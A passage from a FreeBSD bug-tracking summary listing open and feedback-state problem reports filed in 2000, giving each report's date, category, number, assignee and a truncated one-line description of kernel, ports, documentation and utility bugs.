vmstat column alignment, %ll not s o [2000/01/19] misc/16208 ps/2 mouse problem o [2000/01/19] misc/16212 in /stand/sysinstall -- cannot exit menu o [2000/01/20] ports/16220 obrien -frepo is broken in gcc-devel and egcs po o [2000/01/21] ports/16252 portmgr bsd.port.mk: Add bzip2 support for distri o [2000/01/21] bin/16275 steve approve send-pr(1) (attach files, use env o [2000/01/22] kern/16292 performance problem of divert socket o [2000/01/23] bin/16316 Enhancement: allow .fakeid to be a named o [2000/01/23] bin/16320 fstat -f confuses some partitions o [2000/01/24] kern/16339 vm/vm_page.h PQ_L2_SIZE options too limit o [2000/01/25] ports/16347 sobomax Inconsistencies between Java ports o [2000/01/25] kern/16360 kernel timestamping of ICMP echo requests o [2000/01/26] bin/16364 [PATCH] Add msdosfs and cd9660 support to f [2000/01/26] ports/16374 ache Ports fix: news/tin o [2000/01/27] i386/16411 DUMP freezes system if uucico or samba wr o [2000/01/28] bin/16422 newfs always make root's / directory o [2000/01/30] bin/16480 locked accounts and adduser o [2000/02/06] conf/16536 size of /var/spool/uucp/Log, a UUCP logfi o [2000/02/06] kern/16551 cosmetic cleanup in sys/dev/ppbus/pcfcloc o [2000/02/07] ports/16570 asami ports toplevel README.html has bad link t o [2000/02/08] conf/16584 jkh Hostname field too small during install ( o [2000/02/09] bin/16619 trimdomain does not handle peer domains o [2000/02/09] bin/16625 Incorrect information in routed(8) error o [2000/02/10] ports/16640 jfitz rwhois port install tries to copy wrong l o [2000/02/10] bin/16649 /bin/lastcomm: output contains extraneous o [2000/02/11] bin/16657 /bin/hostname: New feature to return subc o [2000/02/13] bin/16705 ftpd doesn't support -h option o [2000/02/14] kern/16709 PATCH: make poll work for -STABLE's Audio o [2000/02/14] kern/16713 grog Vinum: some processes would not die; ps a o [2000/02/14] misc/16719 /stand/sysinstall does not redraw the scr o [2000/02/14] i386/16722 squid (a 3.x binary) won't run under 4.0- o [2000/02/15] bin/16726 rpc.rstatd from inetd sig11's o [2000/02/16] kern/16745 Kernel Makefile doesn't sanitise PATH [PA o [2000/02/16] kern/16765 Add support for mark/space parity o [2000/02/18] kern/16815 dillon Cannot "rm -rf" for not-existed file on r o [2000/02/19] misc/16830 markm PAM-related error messages on -current o [2000/02/20] misc/16839 dan MFC Matthew D. Fuller's patch to deal wit o [2000/02/20] misc/16840 dan MFC: Matthew D. Fuller's teach pkg_info t o [2000/02/20] misc/16843 jkh Knob for release/Makefile to prevent dele o [2000/02/21] ports/16872 max Update port: japanese/pine o [2000/02/21] bin/16880 davidn [PATCH] pw(8) hardcodes directory creatio o [2000/02/22] bin/16924 tmpfile(3) ignores TMPDIR and always uses o [2000/02/22] bin/16926 mikeh [PATCH] banner doesn't allocate space fo o [2000/02/22] kern/16928 dynamic sysctl enhancement o [2000/02/23] misc/16938 FTP does not fully parse ftp:// URLs o [2000/02/24] misc/16969 yokota /kernel: psmintr: out of sync (0000 != 00 o [2000/02/24] bin/16971 Exiting from /usr/sbin/login does not res o [2000/02/26] kern/17003 dscheck() overzealously protects labels o o [2000/02/26] kern/17007 This is a code for implementing ethernet o [2000/02/27] conf/17022 rwatson newsyslog.conf not in sync with syslog.co o [2000/02/27] alpha/17032 alpha strtod(3) floating exception o [2000/02/28] misc/17045 Cannot install on Siemens Primergy 870 (d o [2000/02/28] kern/17058 mjacob SCSI tape driver can't drive devs that ca o [2000/02/29] bin/17077 yokota write() error o [2000/03/01] docs/17104 phantom gethostbyname(3) contains a reference to o [2000/03/01] kern/17109 darrenr fastroute crashes for lo0 udp o [2000/03/02] misc/17132 bugs in xdr functions o [2000/03/02] ports/17139 billf PLIST correction for Apache13-fp o [2000/03/04] misc/17185 main ncurses headerfile is installed as c o [2000/03/04] gnu/17202 uucp grade patch and policy o [2000/03/05] conf/17207 disktab support for Fuji-MO o [2000/03/05] gnu/17214 obrien gdb doesn't honor auto-solib-add o [2000/03/06] kern/17222 Avance Logic ALS/100 sound card doesn't r o [2000/03/06] kern/17224 4.0-20000214-CURRENT: pcm/csa sound - sha o [2000/03/06] bin/17226 markm ftpd can't use PAM o [2000/03/07] ports/17255 pst Update the GNATS port to 3.113 o [2000/03/08] misc/17272 deleting a file that a program has open c o [2000/03/08] misc/17275 portmgr make release fails when making readmes fo o [2000/03/09] bin/17289 [PATCH] wrong permissions on /var/run/pri o [2000/03/09] ports/17293 ports samba port installs man-pages twice, fail o [2000/03/09] kern/17297 Panic when mounting a CDRom o [2000/03/13] kern/17358 PCI ids for Aureal 8810, 8820 and 8830 au o [2000/03/13] bin/17363 crontab(1) leaves files in /var/cron/tabs o [2000/03/13] bin/17368 billf Bad error messaging from mountd(8) o [2000/03/14] misc/17377 "Checking for rejected mail hosts:" gives o [2000/03/14] kern/17385 Support for IIT's "XC87SLC-33" numeric pr o [2000/03/15] bin/17389 /bin/cp failed on some synthetic vfs o [2000/03/15] bin/17395 This is a replacement for the perl versio o [2000/03/15] misc/17399 FTPing into machine slows it down o [2000/03/16] bin/17405 one more fstat patch o [2000/03/16] alpha/17411 alpha No link/activity lights Alpha ethernet ca o [2000/03/16] kern/17425 nsouch [PATCH] fix two small printing errors in o [2000/03/17] bin/17430 jkh Missing Czech keyboard in /stand/sysinsta f [2000/03/17] kern/17438 cg newpcm volume too low on Soundblaster Pro o [2000/03/18] ports/17471 rse presence of devel/pth-devel port breaks w o [2000/03/18] ports/17479 portmgr bsd.port.mk: PARALLEL_BUILD o [2000/03/18] bin/17480 m4 changecom doesn't work as documented o [2000/03/19] ports/17489 ports Zephyr port is broken with Kerberos enabl o [2000/03/19] ports/17490 markm ports fail for some gnu programs as the g o [2000/03/19] kern/17493 Updates to use FreeBSD as a firewall and o [2000/03/20] i386/17505 Problems with with SMP on Compaq proliant f [2000/03/20] docs/17521 doc Proposed FAQ on assembly programming o [2000/03/22] bin/17546 murray Sysinstall does not let you configure NIS o [2000/03/24] kern/17581 devices failing probing do so silently o [2000/03/25] ports/17602 jmz Port fix x11/XFree86-4.0 (make deinstall o [2000/03/26] bin/17611 f77 man page needs updated o [2000/03/27] bin/17619 pax cannot read all tar files created by o [2000/03/27] bin/17623 date(1) -v doesn't handle time changes (D o [2000/03/27] i386/17628 mdodd 3c509b hangs on running ifconfig o [2000/03/28] bin/17640 lseek();read() -> pread() in dump and fsc o [2000/03/29] bin/17679 wpaul wicontrol should take multiple args on co o [2000/03/30] kern/17688 es_callback() in /sys/pci/es1370.c does n o [2000/03/30] bin/17694 wcstombs(), mbstowcs() not complying with o [2000/03/30] conf/17699 Support for dutch keyboards in the consol o [2000/03/31] bin/17720 presence of old /dev entries causes sysin o [2000/04/01] kern/17728 probe Macronix 98715/98715A 10/100BaseTX f [2000/04/01] misc/17737 dwhite Major repair of PicoBSD o [2000/04/01] bin/17739 Traceroute will not compile without IPSEC o [2000/04/02] kern/17751 wpaul rl driver loaded as module when it alread f [2000/04/02] kern/17758 green Make sl driver dynamicallly expandable. o [2000/04/03] bin/17772 TFTP can not handle big files (> 32MBytes o [2000/04/03] kern/17774 doc stray irq7 o [2000/04/03] kern/17775 4.0-STABLE: Adaptec-155-ATM at en0 causi o [2000/04/04] ports/17801 jake new port: devel/binutils11 o [2000/04/04] ports/17802 jake port update: devel/gcc11 o [2000/04/04] ports/17803 jake new port: devel/gdb11 o [2000/04/05] gnu/17812 gprof gives error: o [2000/04/05] kern/17819 adrian Build ports on nfs & union mount panics k f [2000/04/06] bin/17824 sheldonh [PATCH] /usr/bin/column has arithmetic ov o [2000/04/06] bin/17830 /usr/bin/login called from command line d o [2000/04/07] misc/17848 Patches to remove support for CSRG libm f [2000/04/07] docs/17855 alex PPP Primer is out-of-date o [2000/04/07] misc/17857 During a sysinstall kernel sources say th o [2000/04/09] misc/17889 certain type of DNS queries seem to get d o [2000/04/10] ports/17897 chuckr transfig does not compile with XFree86-4. o [2000/04/10] i386/17906 le ethernet device doesn't work in 4.0 o [2000/04/10] kern/17907 cg Audio record levels are too low o [2000/04/10] docs/17916 alex [PATCH] rewrite of cutting-edge section o a [2000/04/11] bin/17939 sheldonh routed calls ntohs twice on the same fiel o [2000/04/12] ports/17952 torstenb [PATCH] tcp_wrappers port to give better o [2000/04/12] misc/17957 installer navigation is confusing o [2000/04/13] conf/17993 improving on the default /etc/amd.map o [2000/04/13] bin/17997 nvi doesn't set variables on startup (via o [2000/04/14] misc/18014 Machine doesn't boot without keyboard att o [2000/04/17] ports/18057 jmz make install for XFree86-4 fails on alpha o [2000/04/18] bin/18080 davidn [PATCH] pw documentation updated to refle o [2000/04/18] ports/18083 rse Gratuitous Apache package inconsistencies o [2000/04/19] misc/18097 What is this: LIBRATION not specified - u o [2000/04/19] bin/18100 update to src/usr.bin/from/from.c for mul o [2000/04/20] misc/18109 green if pw_shell is empty(/bin/sh is assumed), s [2000/04/20] bin/18114 ken msps from iostat is wrong o [2000/04/21] misc/18131 MAX_IFS in pppd/sys-bsd.c too small for m a [2000/04/22] conf/18152 /etc/exports should suggest how to get mo o [2000/04/22] i386/18154 [PATCH] Add cpu class and features flags o [2000/04/22] bin/18157 pnpinfo only prints first io-start for ev o [2000/04/22] conf/18164 roberto /var/log/ntpstats fill with stat files by o [2000/04/23] ports/18184 ache GNU Patch 2.5.4 Port o [2000/04/26] kern/18232 SMP + APM configerd 4.0 kernel did panic o [2000/04/26] docs/18243 alex wrong description of -p option in sh(1) m o [2000/04/27] misc/18255 makewhatis weekly job doesn't look at /us o [2000/04/27] ports/18256 sada www/netscape4* lacks Fortify on alpha o [2000/04/28] kern/18271 simplelock: klds not portable across UP a o [2000/04/28] bin/18275 proposed TMPDIR setting and /usr/bin/mkin o [2000/04/28] kern/18289 CPU Time exceeded delivered multiple time o [2000/04/29] ports/18291 asami make makesum fetches new sources, make fe o [2000/04/29] kern/18293 lack of versapad mouse wheel emulation o [2000/04/29] kern/18295 Audio is gone after hibernation o [2000/04/30] bin/18319 "dump" fails with "cannot reopen disk: in o [2000/05/01] bin/18326 dwmalone no /usr/libdata/lint/llib-lc.ln o [2000/05/01] bin/18329 ben futimes() and lutimes() missing from ' cannot be used in "via" o [2000/05/29] ports/18896 jseger Tcl "info hostname" command returns chop- o [2000/05/30] kern/18909 dwmalone select(2) timeout limited to 100000000 se o [2000/05/31] kern/18928 options ROOTDENAME=xxx on kernel config f o [2000/06/01] bin/18946 jhb Add support for enabling USB daemon from o [2000/06/01] ports/18960 portmgr Add USE_APACHE to bsd.port.mk for Apache o [2000/06/01] bin/18961 green sshd does not print before motd o [2000/06/02] bin/18967 ypserv not linked with tcp wrappers o [2000/06/03] misc/18987 Problems with Comtrol RocketPort o [2000/06/03] bin/18992 brian log packets blocked by filter rules o [2000/06/03] misc/18997 markm Kerberos5 CFLAGS needed o [2000/06/04] conf/19001 Delayed fsck + mount of insignificant fil o [2000/06/05] docs/19010 doc Bad144 obsoletion by 4.0 is undocumented; o [2000/06/05] i386/19012 No volume run out for /var and lead my Fr o [2000/06/05] misc/19037 Keyboard not detected on new install o [2000/06/06] bin/19056 yacc in 3.4 and 4.0 reports "maximum tabl o [2000/06/06] bin/19057 offer of patch to uname that produces pre f [2000/06/06] ports/19061 kuriyama ports/textproc/lotusxsl the source zip pa f [2000/06/06] kern/19063 rnordier VGA keyboard sometimes fails to work in b o [2000/06/06] bin/19071 ru fmt not folding very long lines o [2000/06/07] ports/19112 portmgr files with names something,v in patches d o [2000/06/08] bin/19118 vmstat¤Ç avm¤Èfre¤ÎÃͤ¬Àܤ¹¤ë¡£ o [2000/06/08] misc/19124 ps(1) to support SysV-style options? o [2000/06/08] misc/19129 AMI Raid Express 200 card extremely slow o [2000/06/09] kern/19156 jkh Enable the doFS.sh to run in arbitrary lo o [2000/06/09] kern/19158 U.S.Robotics 56K FAX INT not recognize co o [2000/06/10] bin/19183 more(1) doesn't handle redraw correctly o [2000/06/11] kern/19213 SC_DFLT_FONT compile option breaks kernel f [2000/06/13] conf/19236 sanpei not-existing PCMCI cards in pccard.conf.s o [2000/06/13] bin/19239 login allows users to login remotely with o [2000/06/13] misc/19246 portmgr Poor error message when fetching files wi o [2000/06/13] ports/19253 dirk mod_php4 has pkg dependency when not usin o [2000/06/14] ports/19270 portmgr Ports build mechanism doesn't check wheth o [2000/06/15] ports/19325 tom ports/mail/ezmlm-idx: mysql & pgsql suppo o [2000/06/15] gnu/19327 obrien Fix to build 'a.out' binary. o [2000/06/17] bin/19355 fstat gives signal 10 (SIGBUS) when outpu o [2000/06/18] misc/19367 markm /etc/defaults/make.conf lists wrong value o [2000/06/18] bin/19369 Inadequate error reporting in "mount" com o [2000/06/19] misc/19391 marcel Evilness with Linux Terminus, causes X to o [2000/06/20] bin/19404 /usr/bin/error should be included in the o [2000/06/20] misc/19406 setenv() allocates memory which is not fr o [2000/06/20] i386/19410 spontaneous reboot when esd runs on a -ST o [2000/06/21] bin/19422 users can overflow argv to make ps segfau o [2000/06/22] conf/19442 can't install on diverse harddisks. o [2000/06/22] ports/19448 markm filename input broken o [2000/06/22] ports/19456 chuckr the sp port is hardwired to install it's o [2000/06/22] ports/19457 vanilla The gimp port has /usr/local/bin hardwire o [2000/06/23] misc/19467 green OpenSSH (as an rsync tunnel) blocks forev o [2000/06/23] docs/19481 doc Serial Communications chapter in Handbook o [2000/06/24] kern/19490 faith0 network device has high number of o [2000/06/25] kern/19497 Adaptec AHA-1530P PNP scsi card is not re o [2000/06/25] ports/19498 ports ssh (1) instal fails o [2000/06/26] bin/19514 patch to prevent tail'ing directories o [2000/06/26] ports/19523 billf Update port: graphics/gd o [2000/06/26] kern/19535 adrian procfs_rlimit tidyup o [2000/06/26] bin/19536 patch to prevent head'ing directories o [2000/06/28] bin/19558 amd doesn't know whether NFS feature is a o [2000/06/28] misc/19564 PNP-Id for ESS1681 o [2000/06/28] ports/19571 tg python/TKinter busy waits o [2000/06/28] conf/19573 des Dot Files for Optional Shells o [2000/06/29] ports/19585 obrien bounce port misconfiguration o [2000/06/29] ports/19591 issei ssh2 port ignores 'ignorenologin' from lo f [2000/06/30] ports/19594 trevor update port: qrash o [2000/06/30] bin/19598 traceroutes default of 30 Hops is too low o [2000/07/01] kern/19624 make {DFL,MAX}SSIZ kernel options o [2000/07/01] bin/19635 add -c for grand total to df(1), like du( o [2000/07/02] gnu/19642 kbyanc patch to merge OpenBSD changes to patch(1 o [2000/07/02] ports/19650 asami python package causes segmentation fault o [2000/07/03] bin/19683 green mount displays incorrect mount point on f a [2000/07/03] kern/19686 yokota splash screen fails o [2000/07/03] kern/19688 jlemon Some boundry checking KASSERTS in network o [2000/07/05] kern/19706 Framing error on PC/NET 32 also used in o o [2000/07/05] bin/19719 imp pccard_ether lacks the start_if hooks as o [2000/07/05] kern/19720 kbyanc more sysctl signed-ness patches o [2000/07/05] misc/19725 4.0-STABLE: sys/boot/ficl build fails if o [2000/07/06] gnu/19733 obrien GDB 4.18 is not GDB 4.18 o [2000/07/07] bin/19755 nologin not configurable o [2000/07/07] kern/19756 sheldonh Inability to use linux extended partition o [2000/07/07] bin/19772 df output wrong for union-mounts o [2000/07/08] kern/19782 dirk mkisofs 1.12.1 (i386-unknown-freebsd4.0) f [2000/07/09] misc/19798 cg 4DWAVE doesn't work. o [2000/07/09] misc/19805 not installable on old-fashioned dx50 o [2000/07/09] ports/19806 ports error message w/xcdplayer: ioctl (cdromr o [2000/07/10] ports/19823 abe gnucache build depends on unimplemented s o [2000/07/10] kern/19827 yokota psm flag bit9(NOIDPROBE) doesn't work cor o [2000/07/10] misc/19837 murray Run Fit it floppy from serial port o [2000/07/11] conf/19849 MAKEDEV still defaults to da0X instead of o [2000/07/11] kern/19863 markm Non-blocking IO not supported on /dev/ran o [2000/07/12] ports/19868 portmgr modify ports/Mk/bsd.port.mk to remove ALL o [2000/07/12] kern/19871 select on named pipes always returns 'ava o [2000/07/13] kern/19887 mjacob Boot hang while scanning SCSI bus o [2000/07/13] i386/19890 davidn Stallion serial driver support missing [p o [2000/07/14] kern/19913 des add SYN+FIN counter o [2000/07/15] kern/19966 new syscons screensaver o [2000/07/16] i386/19972 Add of pckg (several pkgs) aborted, error o [2000/07/17] ports/19977 rse mod_php3 and mod_php4 ports doesn't recog f [2000/07/17] docs/19981 doc Indonesian translations o [2000/07/18] gnu/20004 obrien FBSD4 gcc __attribute__(constructor) not o [2000/07/18] misc/20024 jake [PATCH] queue(3) concatenation macros o [2000/07/19] bin/20042 "rsh -t" doesn't timeout if rcmd(3) never o [2000/07/20] bin/20054 ftpd: rotating _PATH_FTPDSTATFILE losts x o [2000/07/23] docs/20121 jim Better user ppp documentation in man page o [2000/07/24] misc/20139 msmith Simple typo in src/share/examples/ppi/ppi o [2000/07/24] ports/20145 dburr improving the devel/SN port o [2000/07/24] misc/20159 strftime() can't produce ISO8601 format t o [2000/07/24] bin/20165 markm PERL_THREADED=true fails; "yes" works; ma o [2000/07/24] misc/20166 billf Corrections & additions to games/quiz/dat f [2000/07/26] kern/20198 luigi log setup of dynamic rules for ipfw o [2000/07/26] bin/20204 ps more doesn't handle 8-bit characters prop o [2000/07/27] kern/20214 dec kernel routing bug for nexthop is routed o [2000/07/28] misc/20254 jhb BTX loader 1.00 can not recognize floppy o [2000/07/28] ports/20270 reg libtool needlessly runs ldconfig after in o [2000/07/29] kern/20297 cg Joystick is not enabled with es1370 based o [2000/07/30] ports/20301 billf New port: irc/ircd-hybrid6 o [2000/07/31] bin/20311 markm src/release/Makefile: broken CHECKSUM.MD5 o [2000/07/31] misc/20326 marcel [PATCH] installkernel fails if DESTDIR is o [2000/07/31] misc/20333 sheldonh ftp login fails on unix password when s/k o [2000/08/01] kern/20352 yokota Configuring a synaptics touchpad o [2000/08/02] ports/20359 demon New port: Apache-mod_perl_guide o [2000/08/02] bin/20371 dhclient inserts bogus configurations o [2000/08/03] kern/20384 n_hibma Phase errors with Zip650 CD on USB o [2000/08/03] kern/20389 ken "device pass" required for CD ripping o [2000/08/03] bin/20391 jhb sysinstall should check debug.boothowto s o [2000/08/03] kern/20393 dillon processes get stuck in vmwait instead of o [2000/08/04] docs/20400 doc Building a kernel with debugging info sec o [2000/08/04] bin/20402 ache 4.1R's ls conflicts with Emacs' dired mod o [2000/08/04] misc/20408 Distribution CDs will not boot on IBM Thi o [2000/08/04] kern/20410 sio support for high speed NS16550A, ST16 o [2000/08/05] conf/20436 asmodai Can't make only cd0 under 4.1-STABLE o [2000/08/06] kern/20448 luigi expired dynamic rules shown in "ipfw get" o [2000/08/07] misc/20457 davidn pw command doesn't generate random passwo o [2000/08/07] kern/20473 itojun socket(AF_INET, SOCK_RAW, 4) no longer wo o [2000/08/07] misc/20475 mjacob SES/SAF-TE giving bogus temps on JMR ELEC o [2000/08/08] conf/20479 updates for rc.conf.5 manpage o [2000/08/08] i386/20485 AdvanSys ISA probe problems in 4.1-R GENE o [2000/08/09] ports/20499 obrien [PATCH] conserver port doesn't like MD5 c o [2000/08/09] bin/20501 extra flag to dump to offline autoloaders a [2000/08/10] ports/20520 olgeni New port: lang/mercury o [2000/08/10] docs/20528 doc sysconf(3) manpage doesn't mention posix. s [2000/08/10] kern/20529 billf gigabit cards fail to link o [2000/08/11] i386/20537 msmith HP NetRAID controller error when rebootin o [2000/08/13] ports/20587 kiri Update port: upsd-2.0.1.6 o [2000/08/13] ports/20588 kiri New port: upsd100-2.0.1.6(sysutils/upsd10 o [2000/08/14] bin/20600 net getpeereid obtains credentials from conne o [2000/08/14] ports/20601 ports DESTDIR and /etc/shells a [2000/08/14] ports/20610 ports New port of cgoban2 o [2000/08/15] bin/20613 des fetch -T n is not timeout correctly when o [2000/08/15] ports/20627 jseger tcl83 build is broken o [2000/08/16] ports/20644 ports Installation of port DAP requires compat3 o [2000/08/16] i386/20660 wpaul if_wi provides 802.11 src and dst, not et o [2000/08/17] ports/20678 portmgr make SORTED_MASTER_SITES_CMD variable ove o [2000/08/17] bin/20681 des [PATCH] show service names in netstat and o [2000/08/20] ports/20730 adrian Update Squid 2.3-STABLE4 with latest vend o [2000/08/20] docs/20738 doc correction and modification to clocks(7) o [2000/08/21] bin/20742 ps Weird problem with 'more' on 4-1-STABLE o [2000/08/22] conf/20774 sheldonh 'NFS access cache time=2' is not a daemon o [2000/08/23] docs/20794 doc Request 2 good documents under people.fre o [2000/08/23] ports/20795 msmith FBSD 4.x: Citrix client with drive mappin o [2000/08/23] bin/20799 davidn top's problem o [2000/08/23] i386/20803 mdodd ep0 driver finds additional "shadow" ep c o [2000/08/23] kern/20804 deadlocking when using vnode disk file an o [2000/08/23] misc/20808 ps netstat -m doesn't use -N or -M arguments o [2000/08/24] bin/20824 ftpd returns, "ad0s1a: not a plain file." o [2000/08/24] bin/20827 billf pkg_add -r only fetchs one-level deep dep o [2000/08/24] misc/20830 lile kernel link problems with Olicom token ri o [2000/08/25] i386/20845 Cyclades cy driver incompatible with Cycl o [2000/08/25] ports/20849 dec fix port: net/gated o [2000/08/26] kern/20878 wpaul Patch to add support for the 3c556B MiniP o [2000/08/26] bin/20881 kris There's no reason not to build DNSsec-DSA o [2000/08/27] bin/20889 dwmalone syslogd.c still uses depreciated domain A o [2000/08/28] bin/20908 murray /stand/sysinstall too limited in selectio o [2000/08/29] misc/20920 yokota window(1) interferes with screensaver o [2000/08/30] bin/20944 ru natd enhancements, default config file an o [2000/08/30] docs/20950 kris [PATCH] openssl.1 has bogus section title f [2000/09/01] kern/20992 kern/tty_subr.c, b_to_q to a clist with n f [2000/09/02] ports/20995 sheldonh freeciv-civ gtk make problem. o [2000/09/02] bin/20996 kris permissions on /usr/bin/opiepasswd a [2000/09/02] kern/21000 sheldonh 4.1-STABLE doesn't have card ID f [2000/09/02] ports/21003 ports New Port, modification of tcopy o [2000/09/02] bin/21008 gad Fix for lpr's handling of lots of jobs in a [2000/09/04] ports/21021 ports graphics/quickpics bogus colorspace error o [2000/09/04] bin/21024 pow() ERANGE bug o [2000/09/04] ports/21038 jseger CFengine doesn't install info files o [2000/09/04] kern/21051 Updating 4.1-RELEASE to -current fails be o [2000/09/05] conf/21059 marcel `make -jN buildkernel' can't keep source o [2000/09/05] conf/21066 Proposed change in rc scripts o [2000/09/05] misc/21070 marcel default setting of ${SUP} in Makefile.inc o [2000/09/06] bin/21074 davidn chkgrp vs group(5) inconsistency f [2000/09/06] bin/21075 sheldonh top: can't allocate sufficient memory o [2000/09/06] bin/21080 mjacob dump doesn't use eject tape device correc o [2000/09/06] bin/21086 joe Annoying little bug using ls -G with o [2000/09/08] ports/21120 grog Update port: x11-servers/x2x o [2000/09/08] gnu/21128 a proposed patch for uucp package o [2000/09/09] bin/21142 [PATCH] avoid errors from "make objlink" o [2000/09/09] kern/21154 Change the name of *_saver.ko to saver_*. o [2000/09/09] kern/21156 yokota [PATCH] inconsistency in scmouse vs xterm s [2000/09/10] bin/21178 ken voltag selector, and unload support for c f [2000/09/10] ports/21179 ports New port: math/gul-vdog-qt o [2000/09/11] ports/21211 rse the startup file installed by apache-mods o [2000/09/12] kern/21222 wrong behavior of concurrent mmap()s on N o [2000/09/12] kern/21229 Proper value for vfs.nfs.access_cache_tim o [2000/09/12] bin/21231 roberto the ntp HTML docs don't have the images f [2000/09/12] kern/21240 mbufs allocated to data is huge number in o [2000/09/12] kern/21242 Koutech PCI dual port serial card patch f [2000/09/12] bin/21246 nvi's -c flag does no do what it is docum o [2000/09/13] misc/21255 phk /sbin/md5 suggestion o [2000/09/14] misc/21265 Not a bug, say: feature? o [2000/09/14] misc/21273 PLIP Configuration in sysinstall is broke o [2000/09/15] misc/21298 tftpd problem "Socket operation on non-so o [2000/09/16] misc/21310 Telnetd locks up when trying to connect v o [2000/09/16] bin/21312 more incorrectly redraws screen on xterm f [2000/09/16] ports/21313 ports vmwarIPv6 and vmware2 panic: Fatal trap 1 o [2000/09/16] bin/21315 Shells often behave oddly when executing f [2000/09/18] ports/21346 ports ports/biology/platon o [2000/09/18] ports/21351 jhb ports/emulators/bfe sourcetarball no long a [2000/09/18] ports/21356 ports New port: mbone/rat30 (rat-3.0.35), the s s [2000/09/18] ports/21371 bp Update port: net/mars_nwe to 0.99.20 o [2000/09/18] misc/21385 yokota About daemon_saver o [2000/09/19] bin/21394 [PATCH] MAKEDEV creates rocketport specia o [2000/09/19] kern/21402 marcel Linuxulator: getpgid(0) fails o [2000/09/19] kern/21405 Default module patch mismatch between ker o [2000/09/19] kern/21409 The ID for the VIA KT133 chipset is not i o [2000/09/20] bin/21436 pkg_install will not compile without erro o [2000/09/21] ports/21460 jseger Patch net/trafshow: Allow showing ipv6 p o [2000/09/22] bin/21476 ftp in 4.1-STABLE fails on http:// URLs o [2000/09/22] conf/21489 imp /etc/pccard_ether feature request o [2000/09/22] misc/21494 ftpd doesn't count o [2000/09/23] misc/21512 cdrdao fails to build with SCGLIB o [2000/09/24] ports/21516 ports New FreeBSD port for Fuzz o [2000/09/24] bin/21519 sys/dir.h should be deprecated some more o [2000/09/24] kern/21524 Crashs while using talk with another loca o [2000/09/24] misc/21528 kris installworld fails in secure/usr.bin/open o [2000/09/24] bin/21531 csh/tcsh provide no way to see/adjust new o [2000/09/25] misc/21536 jkh [PATCH] Add Hungarian FTP mirror to sysin a [2000/09/25] docs/21542 asmodai sigaction(2) man page is misleading o [2000/09/25] bin/21546 netstat -rn output needs netmask info add o [2000/09/25] conf/21551 /etc/services needs a kpop entry f [2000/09/26] bin/21570 dougb [PATCH] Add -r option to /usr/bin/mail, q o [2000/09/26] ports/21584 archie mpd whines if kernel has option NETGRAPH o [2000/09/26] misc/21587 install problem in 4.1-Stable o [2000/09/28] ports/21621 reg Update port: devel/libtool to 1.3.5 o [2000/09/28] kern/21623 wpaul Chipset SiS630E / NIC SiS 900 o [2000/09/29] misc/21644 /usr/include/sys/mman.h uses a type defin o [2000/09/30] bin/21659 Berkeley db library is statically compile o [2000/10/01] i386/21672 AMD Duron Rev. A0 reports incorrect L2 ca o [2000/10/01] misc/21675 Better and more disktab entries for MO dr o [2000/10/02] conf/21695 ifconfig_XXX_aliasY in rc.conf; Y must be o [2000/10/02] docs/21712 dan core(5) manpage fails to mention kern.sug o [2000/10/02] misc/21715 The freebsd mail list digifier loses MIME o [2000/10/02] ports/21719 nbm New Port: Courier Mail Suite o [2000/10/03] conf/21722 The mixer settings are lost on sysetm reb o [2000/10/03] bin/21725 mtree follows symlinks! o [2000/10/03] kern/21737 sendto returns systematically EINVAL with o [2000/10/04] bin/21751 ken libcam's cam_real_open_device() may lose o [2000/10/04] kern/21752 Infortrend IFT-3102 doesn't like SCSI Cac o [2000/10/04] kern/21754 n_hibma Sound stops working when NetGear USB Devi o [2000/10/05] ports/21765 portmgr I cat't make ports using pw_gid) != typeof(group->g o [2000/10/22] bin/22211 typoed tar -c clobbers archives o [2000/10/22] kern/22228 Undocumented LINT option 'PANIC_REBOOT_WA o [2000/10/23] ports/22259 obrien bash: root directory change directory bug o [2000/10/24] bin/22279 stock perl5 build does not support %Z spe o [2000/10/25] ports/22288 ports mod_perl dependancy missing from p5-HTML- a [2000/10/25] ports/22295 ports lua 4.0 beta port o [2000/10/26] conf/22308 mounting NFS during boot blocks if host m o [2000/10/26] ports/22316 hosokawa [PATCH] samba port in a jail(2) environme o [2000/10/26] misc/22332 request to add vtys to /etc/ttys o [2000/10/26] docs/22338 asmodai ugen(4) man page missing o [2000/10/27] bin/22347 dd copies incorrect data after 2^32 bytes o [2000/10/27] bin/22351 sed(1) fails with backslash on buffer bou f [2000/10/28] ports/22379 ports New port: libudbc f [2000/10/28] ports/22381 ports New port: misc/mango o [2000/10/29] ports/22399 msmith PIB 1.2 still looks for MD5 info in files o [2000/10/30] ports/22412 taoka two extraneous ports and one name change s [2000/10/30] docs/22430 darrenr ipresend man page typo o [2000/10/30] misc/22434 problem with certain NIC's using rl on au o [2000/10/31] bin/22442 [PATCH] Increase speed of split(1) o [2000/10/31] kern/22466 yokota function prototype inconsist in kbdreg.h f [2000/11/01] docs/22470 doc man 3 msgrcv's BUGS section needs updatin o [2000/11/02] ports/22550 obrien Patch for conserver for log file rotation a [2000/11/03] misc/22582 dd unused descr[] var in sysctl.c:RELENG_4 o [2000/11/03] ports/22590 jseger graphics/xpaint writes pixmaps to stdout o [2000/11/04] kern/22602 CDRoms checked during shutdown (umount) o [2000/11/04] ports/22605 ports xmcd port depends on mailx port o [2000/11/04] bin/22612 crontab -e failures o [2000/11/05] kern/22617 Incorrect PnP ID for ALS120 game/joystick o [2000/11/05] i386/22633 when kernel boots smp scsi fails o [2000/11/06] ports/22637 adrian [PATCH] squid 2.3 fix o [2000/11/06] conf/22645 Cannot override "ignore" in /etc/mail.rc o [2000/11/07] misc/22660 termcap kterm entry tc=xterm is wrong f [2000/11/07] ports/22683 ports New port net/dnip-update o [2000/11/08] misc/22696 picobsd build with router configuration c o [2000/11/08] ports/22698 nbm Ports' rc.d files should use rc.conf o [2000/11/08] ports/22704 ports cyrus and cyrus-sasl both install pwcheck o [2000/11/08] kern/22709 yokota daemon_saver.c fails compile with -Wall - o [2000/11/08] kern/22710 yokota snake_saver and star_saver fail to compil o [2000/11/09] ports/22716 billf [PATCH] ports/net/ucd-snmp o [2000/11/09] conf/22718 sysinstall in FreeBSD 3.5.1 generates bad o [2000/11/09] ports/22729 billf net/ucd-snmp cannot be made on current o [2000/11/09] bin/22730 tcpslice doesn't handle long file offsets o [2000/11/10] ports/22735 will KGhostView doesn't recognize spaces in fi o [2000/11/10] kern/22754 mmap man page states that non-page aligne o [2000/11/10] alpha/22759 alpha zip cannot work with existing .zip archiv o [2000/11/12] kern/22801 Modem 'OMRON ME5614ISA' is not recognized o [2000/11/13] alpha/22824 alpha unaligned accesses from dhclient f [2000/11/13] bin/22828 darrenr patch to enable use of LOG_SECURITY in ip o [2000/11/14] conf/22859 darrenr rc.network should start 